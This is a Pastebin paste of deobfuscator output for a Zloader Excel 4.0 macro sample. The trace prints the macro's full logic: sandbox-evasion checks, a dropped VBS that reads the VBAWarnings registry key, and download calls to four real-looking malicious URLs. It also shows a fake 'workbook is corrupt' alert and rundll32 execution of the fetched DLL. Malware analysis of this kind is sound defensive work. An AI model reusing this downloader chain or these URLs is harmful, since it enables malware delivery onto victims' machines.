API tools faq
paste
Advertisement
dissectmalware

Zloader

dissectmalware
Jun 26th, 2020
622
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.83 KB | None | 0 0
raw download clone embed print report
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\inf.4669.xls\inf.4669.xls
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\inf.4669.xls\inf.4669.xls
  24.  
  25. Unencrypted xls file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->'VyNand2egLwRTDtMIW'!$BH$12271
  29. [Starting Deobfuscation]
  30. CELL:BH12271 , FullEvaluation , FORMULA("=CHAR(R[29606]C[-87])",VyNand2egLwRTDtMIW$FH$5452:$FH$5532)
  31. CELL:BH12272 , FullEvaluation , "=FORMULA(R[37662]C[104],R[7636]C[31])"
  32. CELL:BH12273 , FullEvaluation , "=FORMULA(R[-12942]C[63],R[4358]C[-58])"
  33. CELL:BH12274 , FullEvaluation , "=FORMULA(R[-16395]C[73],R[5082]C[-38])"
  34. CELL:BH12275 , FullEvaluation , ON.TIME(2020-06-26 11:40:51.991544,'VyNand2egLwRTDtMIW'!IG48282)
  35. CELL:IG48282 , FullEvaluation , "=CLOSE(FALSE)"
  36. CELL:IG48283 , FullEvaluation , "=APP.MAXIMIZE()"
  37. CELL:IG48284 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R18256C168),)"
  38. CELL:IG48285 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R18256C168))"
  39. CELL:IG48286 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R18256C168),)"
  40. CELL:IG48287 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R18256C168),)"
  41. CELL:IG48288 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)"
  42. CELL:IG48289 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)"
  43. CELL:IG48290 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R18256C168))"
  44. CELL:IG48291 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R18256C168))"
  45. CELL:IG48292 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R18256C168))"
  46. CELL:IG48293 , FullEvaluation , "=""C:\Users\Public\qyUV.vbs"""
  47. CELL:IG48294 , FullEvaluation , "=""C:\Users\Public\gzGD.txt"""
  48. CELL:IG48295 , FullEvaluation , "=FOPEN(R18267C168,3)"
  49. CELL:IG48296 , FullEvaluation , "=FWRITELN(R18269C168,""On Error Resume Next"")"
  50. CELL:IG48297 , FullEvaluation , "=FWRITELN(R18269C168,""Set VFYjmh = CreateObject(""""WScript.Shell"""")"")"
  51. CELL:IG48298 , FullEvaluation , "=FWRITELN(R18269C168,""Set Yt1jI = CreateObject(""""Scripting.FileSystemObject"""")"")"
  52. CELL:IG48299 , FullEvaluation , "=FWRITELN(R18269C168,""Set BIj = Yt1jI.CreateTextFile(""""""&R18268C168&"""""", True)"")"
  53. CELL:IG48300 , FullEvaluation , "=FWRITELN(R18269C168,""BIj.WriteLine(VFYjmh.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  54. CELL:IG48301 , FullEvaluation , "=FWRITELN(R18269C168,""BIj.Close"")"
  55. CELL:IG48302 , FullEvaluation , "=FCLOSE(R18269C168)"
  56. CELL:IG48303 , FullEvaluation , "=EXEC(""explorer.exe ""&R18267C168&"""")"
  57. CELL:IG48304 , FullEvaluation , "=WHILE(ISERROR(FILES(R18268C168)))"
  58. CELL:IG48305 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  59. CELL:IG48306 , FullEvaluation , "=NEXT()"
  60. CELL:IG48307 , FullEvaluation , "=FILE.DELETE(R18267C168)"
  61. CELL:IG48308 , FullEvaluation , "=FOPEN(R18268C168,2)"
  62. CELL:IG48309 , FullEvaluation , "=FREAD(R18282C168,100)"
  63. CELL:IG48310 , FullEvaluation , "=FCLOSE(R18282C168)"
  64. CELL:IG48311 , FullEvaluation , "=FILE.DELETE(R18268C168)"
  65. CELL:IG48312 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R18283C168)),GOTO(R18256C168),)"
  66. CELL:IG48313 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))"
  67. CELL:IG48314 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.134456,'VyNand2egLwRTDtMIW'!EG10619)
  68. CELL:EG10619 , FullEvaluation , FORMULA("=FORMULA(R[37662]C[104],R[7636]C[31])",VyNand2egLwRTDtMIW$EG$10620:$EG$10651)
  69. CELL:EG10620 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[7636]C[31])
  70. CELL:EG10621 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[7636]C[31])
  71. CELL:EG10622 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R18256C168),)",R[7636]C[31])
  72. CELL:EG10623 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R18256C168))",R[7636]C[31])
  73. CELL:EG10624 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R18256C168),)",R[7636]C[31])
  74. CELL:EG10625 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R18256C168),)",R[7636]C[31])
  75. CELL:EG10626 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)",R[7636]C[31])
  76. CELL:EG10627 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)",R[7636]C[31])
  77. CELL:EG10628 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R18256C168))",R[7636]C[31])
  78. CELL:EG10629 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R18256C168))",R[7636]C[31])
  79. CELL:EG10630 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R18256C168))",R[7636]C[31])
  80. CELL:EG10631 , FullEvaluation , FORMULA("=""C:\Users\Public\qyUV.vbs""",R[7636]C[31])
  81. CELL:EG10632 , FullEvaluation , FORMULA("=""C:\Users\Public\gzGD.txt""",R[7636]C[31])
  82. CELL:EG10633 , FullEvaluation , FORMULA("=FOPEN(R18267C168,3)",R[7636]C[31])
  83. CELL:EG10634 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""On Error Resume Next"")",R[7636]C[31])
  84. CELL:EG10635 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set VFYjmh = CreateObject(""""WScript.Shell"""")"")",R[7636]C[31])
  85. CELL:EG10636 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set Yt1jI = CreateObject(""""Scripting.FileSystemObject"""")"")",R[7636]C[31])
  86. CELL:EG10637 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""Set BIj = Yt1jI.CreateTextFile(""""""&R18268C168&"""""", True)"")",R[7636]C[31])
  87. CELL:EG10638 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""BIj.WriteLine(VFYjmh.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[7636]C[31])
  88. CELL:EG10639 , FullEvaluation , FORMULA("=FWRITELN(R18269C168,""BIj.Close"")",R[7636]C[31])
  89. CELL:EG10640 , FullEvaluation , FORMULA("=FCLOSE(R18269C168)",R[7636]C[31])
  90. CELL:EG10641 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R18267C168&"""")",R[7636]C[31])
  91. CELL:EG10642 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R18268C168)))",R[7636]C[31])
  92. CELL:EG10643 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[7636]C[31])
  93. CELL:EG10644 , FullEvaluation , FORMULA("=NEXT()",R[7636]C[31])
  94. CELL:EG10645 , FullEvaluation , FORMULA("=FILE.DELETE(R18267C168)",R[7636]C[31])
  95. CELL:EG10646 , FullEvaluation , FORMULA("=FOPEN(R18268C168,2)",R[7636]C[31])
  96. CELL:EG10647 , FullEvaluation , FORMULA("=FREAD(R18282C168,100)",R[7636]C[31])
  97. CELL:EG10648 , FullEvaluation , FORMULA("=FCLOSE(R18282C168)",R[7636]C[31])
  98. CELL:EG10649 , FullEvaluation , FORMULA("=FILE.DELETE(R18268C168)",R[7636]C[31])
  99. CELL:EG10650 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R18283C168)),GOTO(R18256C168),)",R[7636]C[31])
  100. CELL:EG10651 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))",R[7636]C[31])
  101. CELL:EG10652 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.145446,'VyNand2egLwRTDtMIW'!FL18257)
  102. CELL:FL18257 , PartialEvaluation , APP.MAXIMIZE()
  103. CELL:FL18258 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R18256C168),)
  104. CELL:FL18259 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R18256C168))
  105. CELL:FL18260 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R18256C168),)
  106. CELL:FL18261 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R18256C168),)
  107. CELL:FL18262 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R18256C168),)
  108. CELL:FL18263 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R18256C168),)
  109. CELL:FL18264 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R18256C168))
  110. CELL:FL18265 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R18256C168))
  111. CELL:FL18266 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R18256C168))
  112. CELL:FL18266 , FullEvaluation , [TRUE]
  113. CELL:FL18267 , FullEvaluation , "C:\Users\Public\qyUV.vbs"
  114. CELL:FL18268 , FullEvaluation , "C:\Users\Public\gzGD.txt"
  115. CELL:FL18269 , FullEvaluation , FOPEN("C:\Users\Public\qyUV.vbs",3)
  116. CELL:FL18270 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","On Error Resume Next")
  117. CELL:FL18271 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set VFYjmh = CreateObject(""WScript.Shell"")")
  118. CELL:FL18272 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set Yt1jI = CreateObject(""Scripting.FileSystemObject"")")
  119. CELL:FL18273 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","Set BIj = Yt1jI.CreateTextFile(""C:\Users\Public\gzGD.txt"", True)")
  120. CELL:FL18274 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","BIj.WriteLine(VFYjmh.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  121. CELL:FL18275 , FullEvaluation , FWRITE("C:\Users\Public\qyUV.vbs","BIj.Close")
  122. CELL:FL18276 , PartialEvaluation , FCLOSE("C:\Users\Public\qyUV.vbs")
  123. CELL:FL18277 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\qyUV.vbs")
  124. CELL:FL18278 , PartialEvaluation , WHILE(ISERROR(FILES(R18268C168)))
  125. CELL:FL18281 , PartialEvaluation , FILE.DELETE("C:\Users\Public\qyUV.vbs")
  126. CELL:FL18282 , FullEvaluation , FOPEN("C:\Users\Public\gzGD.txt",2)
  127. CELL:FL18283 , PartialEvaluation , FREAD("C:\Users\Public\gzGD.txt",100)
  128. CELL:FL18284 , PartialEvaluation , FCLOSE("C:\Users\Public\gzGD.txt")
  129. CELL:FL18285 , PartialEvaluation , FILE.DELETE("C:\Users\Public\gzGD.txt")
  130. CELL:FL18286 , FullBranching , IF(ISNUMBER(SEARCH("1",R18283C168)),GOTO(R18256C168),)
  131. CELL:FL18286 , FullEvaluation , [TRUE] GOTO(R18256C168)
  132. CELL:FL18256 , End , CLOSE(FALSE)
  133. CELL:FL18286 , FullEvaluation , [FALSE]
  134. CELL:FL18287 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R39084C183),GOTO(R23779C121))
  135. CELL:FL18287 , FullEvaluation , [TRUE] GOTO(R39084C183)
  136. CELL:GA39084 , FullEvaluation , "=""C:\Users\Public\OwP8Hxu4.html"""
  137. CELL:GA39085 , FullEvaluation , "=""https://estudiolacazezancarini.com/wp-crunch.php"""
  138. CELL:GA39086 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56385C62,R56384C62,0,0)"
  139. CELL:GA39087 , FullEvaluation , "=FILES(R56384C62)"
  140. CELL:GA39088 , FullEvaluation , "=IF(ISERROR(R56387C62),GOTO(R56394C62),)"
  141. CELL:GA39089 , FullEvaluation , "=FOPEN(R56384C62)"
  142. CELL:GA39090 , FullEvaluation , "=FSIZE(R56389C62)"
  143. CELL:GA39091 , FullEvaluation , "=FCLOSE(R56389C62)"
  144. CELL:GA39092 , FullEvaluation , "=IF(R56390C62<40000,,GOTO(R56411C62))"
  145. CELL:GA39093 , FullEvaluation , "=""https://germdisruptor.com/wp-crunch.php"""
  146. CELL:GA39094 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56393C62,R56384C62,0,0)"
  147. CELL:GA39095 , FullEvaluation , "=FILES(R56384C62)"
  148. CELL:GA39096 , FullEvaluation , "=IF(ISERROR(R56395C62),GOTO(R56402C62),)"
  149. CELL:GA39097 , FullEvaluation , "=FOPEN(R56384C62)"
  150. CELL:GA39098 , FullEvaluation , "=FSIZE(R56397C62)"
  151. CELL:GA39099 , FullEvaluation , "=FCLOSE(R56397C62)"
  152. CELL:GA39100 , FullEvaluation , "=IF(R56398C62<40000,,GOTO(R56411C62))"
  153. CELL:GA39101 , FullEvaluation , "=""https://gurukal.in/wp-crunch.php"""
  154. CELL:GA39102 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56401C62,R56384C62,0,0)"
  155. CELL:GA39103 , FullEvaluation , "=FILES(R56384C62)"
  156. CELL:GA39104 , FullEvaluation , "=IF(ISERROR(R56403C62),GOTO(R56410C62),)"
  157. CELL:GA39105 , FullEvaluation , "=FOPEN(R56384C62)"
  158. CELL:GA39106 , FullEvaluation , "=FSIZE(R56405C62)"
  159. CELL:GA39107 , FullEvaluation , "=FCLOSE(R56405C62)"
  160. CELL:GA39108 , FullEvaluation , "=IF(R56406C62<40000,,GOTO(R56411C62))"
  161. CELL:GA39109 , FullEvaluation , "=""https://indoeducation.com/wp-crunch.php"""
  162. CELL:GA39110 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56409C62,R56384C62,0,0)"
  163. CELL:GA39111 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  164. CELL:GA39112 , FullEvaluation , "=ALERT(R56411C62)"
  165. CELL:GA39113 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  166. CELL:GA39114 , FullEvaluation , "=R56384C62&"",DllRegisterServer"""
  167. CELL:GA39115 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R56413C62,R56414C62,0,5)"
  168. CELL:GA39116 , FullEvaluation , "=GOTO(R18256C168)"
  169. CELL:GA39117 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.343324,'VyNand2egLwRTDtMIW'!DP52025)
  170. CELL:DP52025 , FullEvaluation , FORMULA("=FORMULA(R[-12942]C[63],R[4358]C[-58])",VyNand2egLwRTDtMIW$DP$52026:$DP$52058)
  171. CELL:DP52026 , FullEvaluation , FORMULA("=""C:\Users\Public\OwP8Hxu4.html""",R[4358]C[-58])
  172. CELL:DP52027 , FullEvaluation , FORMULA("=""https://estudiolacazezancarini.com/wp-crunch.php""",R[4358]C[-58])
  173. CELL:DP52028 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56385C62,R56384C62,0,0)",R[4358]C[-58])
  174. CELL:DP52029 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
  175. CELL:DP52030 , FullEvaluation , FORMULA("=IF(ISERROR(R56387C62),GOTO(R56394C62),)",R[4358]C[-58])
  176. CELL:DP52031 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
  177. CELL:DP52032 , FullEvaluation , FORMULA("=FSIZE(R56389C62)",R[4358]C[-58])
  178. CELL:DP52033 , FullEvaluation , FORMULA("=FCLOSE(R56389C62)",R[4358]C[-58])
  179. CELL:DP52034 , FullEvaluation , FORMULA("=IF(R56390C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
  180. CELL:DP52035 , FullEvaluation , FORMULA("=""https://germdisruptor.com/wp-crunch.php""",R[4358]C[-58])
  181. CELL:DP52036 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56393C62,R56384C62,0,0)",R[4358]C[-58])
  182. CELL:DP52037 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
  183. CELL:DP52038 , FullEvaluation , FORMULA("=IF(ISERROR(R56395C62),GOTO(R56402C62),)",R[4358]C[-58])
  184. CELL:DP52039 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
  185. CELL:DP52040 , FullEvaluation , FORMULA("=FSIZE(R56397C62)",R[4358]C[-58])
  186. CELL:DP52041 , FullEvaluation , FORMULA("=FCLOSE(R56397C62)",R[4358]C[-58])
  187. CELL:DP52042 , FullEvaluation , FORMULA("=IF(R56398C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
  188. CELL:DP52043 , FullEvaluation , FORMULA("=""https://gurukal.in/wp-crunch.php""",R[4358]C[-58])
  189. CELL:DP52044 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56401C62,R56384C62,0,0)",R[4358]C[-58])
  190. CELL:DP52045 , FullEvaluation , FORMULA("=FILES(R56384C62)",R[4358]C[-58])
  191. CELL:DP52046 , FullEvaluation , FORMULA("=IF(ISERROR(R56403C62),GOTO(R56410C62),)",R[4358]C[-58])
  192. CELL:DP52047 , FullEvaluation , FORMULA("=FOPEN(R56384C62)",R[4358]C[-58])
  193. CELL:DP52048 , FullEvaluation , FORMULA("=FSIZE(R56405C62)",R[4358]C[-58])
  194. CELL:DP52049 , FullEvaluation , FORMULA("=FCLOSE(R56405C62)",R[4358]C[-58])
  195. CELL:DP52050 , FullEvaluation , FORMULA("=IF(R56406C62<40000,,GOTO(R56411C62))",R[4358]C[-58])
  196. CELL:DP52051 , FullEvaluation , FORMULA("=""https://indoeducation.com/wp-crunch.php""",R[4358]C[-58])
  197. CELL:DP52052 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R56409C62,R56384C62,0,0)",R[4358]C[-58])
  198. CELL:DP52053 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[4358]C[-58])
  199. CELL:DP52054 , FullEvaluation , FORMULA("=ALERT(R56411C62)",R[4358]C[-58])
  200. CELL:DP52055 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[4358]C[-58])
  201. CELL:DP52056 , FullEvaluation , FORMULA("=R56384C62&"",DllRegisterServer""",R[4358]C[-58])
  202. CELL:DP52057 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R56413C62,R56414C62,0,5)",R[4358]C[-58])
  203. CELL:DP52058 , FullEvaluation , FORMULA("=GOTO(R18256C168)",R[4358]C[-58])
  204. CELL:DP52059 , FullEvaluation , ON.TIME(2020-06-26 11:40:52.355318,'VyNand2egLwRTDtMIW'!BJ56384)
  205. CELL:BJ56384 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html"
  206. CELL:BJ56385 , FullEvaluation , "https://estudiolacazezancarini.com/wp-crunch.php"
  207. CELL:BJ56386 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://estudiolacazezancarini.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  208. CELL:BJ56387 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  209. CELL:BJ56388 , FullBranching , IF(ISERROR(R56387C62),GOTO(R56394C62),)
  210. CELL:BJ56388 , FullEvaluation , [TRUE] GOTO(R56394C62)
  211. CELL:BJ56394 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://germdisruptor.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  212. CELL:BJ56395 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  213. CELL:BJ56396 , FullBranching , IF(ISERROR(R56395C62),GOTO(R56402C62),)
  214. CELL:BJ56396 , FullEvaluation , [TRUE] GOTO(R56402C62)
  215. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  216. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  217. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  218. CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
  219. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  220. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  221. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  222. CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  223. CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
  224. CELL:BJ56415 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\OwP8Hxu4.html,DllRegisterServer",0,5)
  225. CELL:BJ56416 , FullEvaluation , GOTO(R18256C168)
  226. CELL:FL18256 , End , CLOSE(FALSE)
  227. CELL:BJ56404 , FullEvaluation , [FALSE]
  228. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  229. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  230. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  231. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  232. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  233. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  234. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  235. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  236. CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  237. CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
  238. CELL:BJ56415 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\OwP8Hxu4.html,DllRegisterServer",0,5)
  239. CELL:BJ56416 , FullEvaluation , GOTO(R18256C168)
  240. CELL:FL18256 , End , CLOSE(FALSE)
  241. CELL:BJ56396 , FullEvaluation , [FALSE]
  242. CELL:BJ56397 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  243. CELL:BJ56398 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  244. CELL:BJ56399 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  245. CELL:BJ56400 , FullEvaluation , IF(R56398C62<40000,,GOTO(R56411C62))
  246. CELL:BJ56401 , FullEvaluation , "https://gurukal.in/wp-crunch.php"
  247. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  248. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  249. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  250. CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
  251. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  252. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  253. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  254. CELL:BJ56413 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  255. CELL:BJ56414 , FullEvaluation , "C:\Users\Public\OwP8Hxu4.html,DllRegisterServer"
  256. CELL:BJ56404 , FullEvaluation , [FALSE]
  257. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  258. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  259. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  260. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  261. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  262. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  263. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  264. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  265. CELL:BJ56388 , FullEvaluation , [FALSE]
  266. CELL:BJ56389 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  267. CELL:BJ56390 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  268. CELL:BJ56391 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  269. CELL:BJ56392 , FullEvaluation , IF(R56390C62<40000,,GOTO(R56411C62))
  270. CELL:BJ56393 , FullEvaluation , "https://germdisruptor.com/wp-crunch.php"
  271. CELL:BJ56394 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://germdisruptor.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  272. CELL:BJ56395 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  273. CELL:BJ56396 , FullBranching , IF(ISERROR(R56395C62),GOTO(R56402C62),)
  274. CELL:BJ56396 , FullEvaluation , [TRUE] GOTO(R56402C62)
  275. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  276. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
